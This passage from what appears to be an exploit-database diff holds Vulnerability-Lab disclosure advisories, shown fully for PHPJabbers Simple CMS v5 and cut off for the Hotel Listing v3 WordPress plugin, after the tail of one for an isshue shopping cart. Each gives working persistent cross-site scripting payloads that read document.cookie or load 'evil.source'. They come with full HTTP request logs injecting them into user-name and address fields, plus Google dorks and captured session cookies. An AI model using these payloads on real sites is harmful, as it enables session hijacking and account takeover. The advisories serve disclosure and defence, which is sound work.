<a data-func="reload" data-tooltip="Reload" data-toggle="tooltip" data-title="Reload" data-placement="bottom" data-original-title="" title="">
|
||||
<i class="panel-control-icon ti-reload"></i><span class="control-title">Reload</span></a></li><li>
|
||||
<a data-func="minimize" data-tooltip="Minimize" data-toggle="tooltip" data-title="Minimize" data-placement="bottom" data-original-title="" title="">
|
||||
<i class="panel-control-icon ti-minus"></i><span class="control-title">Minimize</span></a></li><li><a data-func="expand"
|
||||
data-tooltip="Fullscreen" data-toggle="tooltip" data-title="Fullscreen" data-placement="bottom" data-original-title="" title="">
|
||||
<i class="panel-control-icon ti-fullscreen"></i><span class="control-title">Fullscreen</span></a></li><li>
|
||||
<a data-func="close" data-tooltip="Close" data-toggle="tooltip" data-title="Close" data-placement="bottom" data-original-title="" title="">
|
||||
<i class="panel-control-icon ti-close"></i><span class="control-title">Close</span></a></li></ul>
|
||||
<div class="dropdown-toggle" data-toggle="dropdown"><span class="panel-control-icon glyphicon glyphicon-cog"></span></div></div></div>
|
||||
<form action="https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice" class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate">
|
||||
<div class="panel-body">
|
||||
<div class="row">
|
||||
<div class="col-sm-8" id="payment_from_1">
|
||||
<div class="form-group row">
|
||||
<label for="customer_name" class="col-sm-3 col-form-label">Customer Name <i class="text-danger">*</i></label>
|
||||
<div class="col-sm-6">
|
||||
<input type="text" size="100" value="a as" name="customer_name" class="customerSelection form-control ui-autocomplete-input" placeholder="Customer Name" id="customer_name" autocomplete="off">
|
||||
<input id="SchoolHiddenId" value="HW77BA6CZEJXCV8" class="customer_hidden_value" type="hidden" name="customer_id">
|
||||
</div>
|
||||
|
||||
|
||||
--- PoC Session Logs (GET) [Execute] ---
|
||||
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
|
||||
Host: isshue.localhost:8080
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Connection: keep-alive
|
||||
Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
|
||||
Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
|
||||
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==
|
||||
-
|
||||
GET: HTTP/2.0 200 OK
|
||||
content-type: text/html; charset=UTF-8
|
||||
vary: Accept-Encoding
|
||||
set-cookie: cookie=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
|
||||
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==; GMT; Max-Age=7200; path=/
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent input validation web vulnerability in the shopping cart web-application is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
260
exploits/php/webapps/50475.txt
Normal file
260
exploits/php/webapps/50475.txt
Normal file
|
@ -0,0 +1,260 @@
|
|||
# Exploit Title: PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
|
||||
# Google Dork: subtitle:Copyright © 2021 PHPJabbers.com
|
||||
# Date: 2021-10-28
|
||||
# Exploit Author: Vulnerability-Lab
|
||||
# Vendor Homepage: https://www.phpjabbers.com/faq.php
|
||||
# Software Link: https://www.phpjabbers.com/simple-cms/
|
||||
# Version: v5
|
||||
# Tested on: Linux
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2300
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-28
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2300
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.4
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
A simple PHP content management system for easy web content editing and publishing. Our PHP Content Management System script is designed
|
||||
to provide you with powerful yet easy content administration tools. The smart CMS lets you create and manage multiple types of web sections
|
||||
and easily embed them into your website. You can upload a wide range of files and add users with different user access levels. Get the
|
||||
Developer License and customize the script to fit your specific needs.
|
||||
|
||||
(Copy of the Homepage:https://www.phpjabbers.com/simple-cms/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the PHPJabbers Simple CMS v5.0 web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
PHPJabbers
|
||||
Product: PHPJabbers Simple CMS v5.0 - (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-09-01: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-09-02: Vendor Notification (Security Department)
|
||||
2021-**-**: Vendor Response/Feedback (Security Department)
|
||||
2021-**-**: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-**-**: Security Acknowledgements (Security Department)
|
||||
2021-10-28: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Moderator Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in the in the PHPJabbers Simple CMS v5.0 web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
|
||||
browser to web-application requests from the application-side.
|
||||
|
||||
The persistent vulnerability is located in the create (pjActionCreate) and update (pjActionUpdate) post method request.
|
||||
Privileged authenticated accounts with ui access are able to inject own malicious script code as name for users.
|
||||
The script code execution is performed after the inject via post method in the user list (pjAdminUsers).
|
||||
|
||||
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external
|
||||
redirects to malicious source and persistent manipulation of affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Create (Add)
|
||||
[+] Update
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] pjActionCreate
|
||||
[+] pjActionUpdate
|
||||
|
||||
Affected Module(s):
|
||||
[+] pjAdminUsers
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent web vulnerability can be exploited by remote attackers with privilged user accounts with low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Payloads
|
||||
"><img src=evil.source onload=alert(document.cookie)>
|
||||
"><img src=evil.source onload=alert(document.domain)>
|
||||
|
||||
|
||||
--- PoC Session Logs (POST) [Add & Update]
|
||||
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
|
||||
Host: phpjabbers-cms.localhost:8080
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 178
|
||||
Origin:https://phpjabbers-cms.localhost:8080
|
||||
Connection: keep-alive
|
||||
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
|
||||
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
|
||||
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
|
||||
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
|
||||
user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r"><img src=evil.source onload=alert(document.cookie)>§ion_allow=1&file_allow=1&status=T
|
||||
-
|
||||
POST: HTTP/1.1 303
|
||||
Server: Apache/2.2.15 (CentOS)
|
||||
Location: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
|
||||
Keep-Alive: timeout=10, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
--
|
||||
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
|
||||
Host: phpjabbers-cms.localhost:8080
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 180
|
||||
Origin:https://phpjabbers-cms.localhost:8080
|
||||
Connection: keep-alive
|
||||
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate&id=2
|
||||
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
|
||||
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
|
||||
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
|
||||
user_update=1&id=2&role_id=2&email=test@test.de&password=test&name=r"><img src=evil.source onload=alert(document.cookie)>§ion_allow=1&file_allow=1&status=T
|
||||
-
|
||||
POST: HTTP/1.1 303
|
||||
Server: Apache/2.2.15 (CentOS)
|
||||
Location:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01
|
||||
Keep-Alive: timeout=10, max=83
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
-
|
||||
https://phpjabbers-cms.localhost:8080/1630949262_438/evil.source
|
||||
Host: phpjabbers-cms.localhost:8080
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Connection: keep-alive
|
||||
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
|
||||
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
|
||||
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
|
||||
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
|
||||
-
|
||||
GET: HTTP/1.1 200 OK
|
||||
Server: Apache/2.2.15 (CentOS)
|
||||
Content-Length: 380
|
||||
Keep-Alive: timeout=10, max=89
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
|
||||
Vulnerable Source: index.php?controller=pjAdminUsers (&action=pjActionIndex&err=AU03)
|
||||
<select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option>
|
||||
<option value="F">Inactive</option></select></td><td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=1"
|
||||
class="pj-table-icon-edit"></a></td></tr><tr class="pj-table-row-even" data-id="id_3"><td><input type="checkbox" name="record[]" value="3"
|
||||
class="pj-table-select-row"></td><td class="pj-table-cell-editable">
|
||||
<span class="pj-table-cell-label">r"><img src="evil.source" onload="alert(document.cookie)"></img></span>
|
||||
<input type="text" data-name="name" style="display: none;" class="pj-form-field pj-form-text
|
||||
pj-selector-editable" value="r"><img src=evil.source onload=alert(document.cookie)>"></td><td class="pj-table-cell-editable">
|
||||
<span class="pj-table-cell-label">test@ftp.world</span><input type="text" data-name="email" style="display: none;"
|
||||
class="pj-form-field pj-form-text pj-selector-editable" value="test@ftp.world"></td><td><span class="pj-table-cell-label">06-09-2021</span></td>
|
||||
<td><span class="pj-table-cell-label"><span class="label-status user-role-editor">editor</span></span></td><td class="pj-table-cell-editable">
|
||||
<span class="pj-table-cell-label pj-status pj-status-T">Active</span><select data-name="status" style="display: none;"
|
||||
class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option><option value="F">Inactive</option></select></td>
|
||||
<td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=3" class="pj-table-icon-edit"></a>
|
||||
<a href="index.php?controller=pjAdminUsers&action=pjActionDeleteUser&id=3" class="pj-table-icon-delete"></a></td></tr></tbody></table>
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://phpjabbers-cms.localhost:8080/
|
||||
https://phpjabbers-cms.localhost:8080/1630949262_438/
|
||||
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php
|
||||
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
|
||||
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
276
exploits/php/webapps/50476.txt
Normal file
276
exploits/php/webapps/50476.txt
Normal file
|
@ -0,0 +1,276 @@
|
|||
# Exploit Title: WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
|
||||
# Date: 2021-10-28
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://hotel.eplug-ins.com/
|
||||
# Software Link: https://hotel.eplug-ins.com/hoteldoc/
|
||||
# Version: v3
|
||||
# Tested on: Linux
|
||||
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2277
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-28
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2277
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.3
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Hotel, Motel , Bar & Restaurant Listing Plugin + Membership plugin using Wordpress with PHP and MySQL Technologie.
|
||||
|
||||
(Copy of the Homepage:https://hotel.eplug-ins.com/hoteldoc/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official Hotel Listing v3.x wordpress plugin web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
e-plugins
|
||||
Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-08-19: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-08-20: Vendor Notification (Security Department)
|
||||
2021-**-**: Vendor Response/Feedback (Security Department)
|
||||
2021-**-**: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-**-**: Security Acknowledgements (Security Department)
|
||||
2021-10-28: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Guest Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
Multiple persistent input validation web vulnerabilities has been discovered in the official Hotel Listing v3.x wordpress plugin web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
|
||||
web-application requests from the application-side.
|
||||
|
||||
The vulnerabilities are located in add new listing - address, city, zipcode, country and location input fields of the my-account module.
|
||||
Remote attackers can register a low privileged application user account to inject own malicious script codes with persistent attack vector to
|
||||
hijack user/admin session credentials or to permanently manipulate affected modules. The execute of the malicious injected script code takes
|
||||
place in the frontend on preview but as well in the backend on interaction to edit or list (?&profile=all-post) by administrative accounts.
|
||||
The request method to inject is post and the attack vector is persistent located on the application-side.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Add New Listing
|
||||
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] address
|
||||
[+] city
|
||||
[+] zipcode
|
||||
[+] country
|
||||
|
||||
Affected Module(s):
|
||||
[+] Frontend on Preview (All Listings)
|
||||
[+] Backend on Preview (All Listings) or Edit
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent web vulnerabilities can be exploited by remote attackers with privilged user accounts with low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Exploitation: Payload
|
||||
%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E
|
||||
|
||||
|
||||
Vulnerable Source: new-listing
|
||||
<div class=" form-group row">
|
||||
<div class="col-md-6 ">
|
||||
<label for="text" class=" control-label col-md-4 ">Address</label>
|
||||
<input type="text" class="form-control col-md-8 " name="address" id="address" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
|
||||
placeholder="Enter address Here">
|
||||
</div>
|
||||
<div class=" col-md-6">
|
||||
<label for="text" class=" control-label col-md-4">Area</label>
|
||||
<input type="text" class="form-control col-md-8" name="area" id="area" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
|
||||
placeholder="Enter Area Here">
|
||||
</div>
|
||||
</div>
|
||||
<div class=" form-group row">
|
||||
<div class="col-md-6 ">
|
||||
<label for="text" class=" control-label col-md-4">City</label>
|
||||
<input type="text" class="form-control col-md-8" name="city" id="city" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
|
||||
placeholder="Enter city ">
|
||||
</div>
|
||||
<div class=" col-md-6">
|
||||
<label for="text" class=" control-label col-md-4">Zipcode</label>
|
||||
<input type="text" class="form-control col-md-8" name="postcode" id="postcode" value="<[MALICIOUS SCRIPT CODE PAYLOAD!]>">>""
|
||||
placeholder="Enter Zipcode ">
|
||||
</div>
|
||||
</div>
|
||||
<div class=" form-group row">
|
||||
<div class=" col-md-6">
|
||||
<label for="text" class=" control-label col-md-4">State</label>
|
||||
<input type="text" class="form-control col-md-8" name="state" id="state" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
|
||||
placeholder="Enter State ">
|
||||
</div>
|
||||
<div class=" col-md-6">
|
||||
<label for="text" class=" control-label col-md-4">Country</label>
|
||||
<input type="text" class="form-control col-md-8" name="country" id="country" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
|
||||
placeholder="Enter Country ">
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
--- PoC Session Logs (POST) ---
|
||||
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
|
||||
Host: hotel-eplug-ins.localhost:8000
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 1603
|
||||
Origin:http://hotel-eplug-ins.localhost:8000
|
||||
Connection: keep-alive
|
||||
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
|
||||
-
|
||||
action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id=
|
||||
&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&area=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
|
||||
city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&postcode=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
|
||||
state=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
|
||||
latitude=&longitude=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description%5B%5D=&
|
||||
award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=&
|
||||
room_order%5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=&
|
||||
Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_and_Extra_Beds=&day_name%5B%5D=Monday+&day_value1%5B%5D=&
|
||||
day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992
|
||||
-
|
||||
POST: HTTP/1.1 200 OK
|
||||
Server: nginx/1.18.0
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Transfer-Encoding: chunked
|
||||
Connection: keep-alive
|
||||
Access-Control-Allow-Origin:http://hotel-eplug-ins.localhost:8000
|
||||
Access-Control-Allow-Credentials: true
|
||||
Cache-Control: no-cache, must-revalidate, max-age=0
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
Referrer-Policy: strict-origin-when-cross-origin
|
||||
Content-Encoding: gzip
|
||||
-
|
||||
http://hotel-eplug-ins.localhost:8000/my-account-2/?&profile=all-post
|
||||
Host: hotel-eplug-ins.localhost:8000
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Connection: keep-alive
|
||||
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
|
||||
-
|
||||
GET: HTTP/1.1 200 OK
|
||||
Server: nginx/1.18.0
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Content-Length: 0
|
||||
Connection: keep-alive
|
||||
Cache-Control: no-cache, must-revalidate, max-age=0
|
||||
X-Redirect-By: WordPress
|
||||
Location:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=all-post
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
1. Encode and parse all vulnerable input fields on transmit via post method request
|
||||
2. Restrict the input fields to disallow usage of special chars
|
||||
3. Encode and escape the output content in the edit and list itself to prevent the execution point
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent cross site scripting web vulnerability in the hotel listing application is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
